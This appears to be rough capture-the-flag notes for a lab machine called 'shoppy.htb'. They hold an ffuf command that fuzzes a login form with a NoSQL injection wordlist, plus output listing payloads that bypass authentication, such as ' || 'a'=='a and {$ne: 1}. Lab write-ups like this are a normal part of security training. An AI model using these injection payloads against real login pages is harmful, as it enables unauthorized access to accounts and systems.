gobuster

dirb

admin redirects to login if not authenticated

https://github.com/ffuf/ffuf/releases/tag/v1.5.0

./ffuf -u http://shoppy.htb/login -c -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -X POST -d 'username=adminFUZZ&password=admin' -H 'Content-Type: application/x-www-form-urlencoded'

{$nin: [""]}} [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 66ms] { $ne: 1 } [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 84ms] db.injection.insert({success:1}); [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 151ms] db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 173ms] {"$gt": ""} [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 175ms] || 1==1 [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 195ms] ' || 'a'=='a [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 254ms]